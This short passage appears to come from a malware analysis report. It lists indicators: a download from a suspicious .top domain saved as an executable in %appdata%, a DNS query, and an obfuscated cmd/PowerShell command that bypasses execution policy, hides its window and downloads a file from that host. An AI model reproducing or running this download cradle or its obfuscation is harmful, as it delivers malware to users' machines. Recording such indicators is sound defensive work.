Technical Information
- http://www.zoerpoled.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWERsHEL^l.EXE -^ExecutIO^nPO^Lic^Y by^PA^SS -N^oP^roFIl^e -w^iNDoWSt^yle Hi^DdEn^ (nEw-^O^b^J^Ect^ ^SYSt^em.nET.We^Bc^L^I^ENT).D^oWNL^O^A^d^F^il^e^(^'http://www.zoerpoled.top/re...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POWERsHEL^l.EXE -^ExecutIO^nPO^Lic^Y by^PA^SS -N^oP^roFIl^e -w^iNDoWSt^yle Hi^DdEn^ (nEw-^O^b^J^Ect^ ^SYSt^em.nET.We^Bc^L^I^ENT).D^oWNL^O^A^d^F^il^e^(^'http://www.zoerpoled.top/re...' (with hidden window)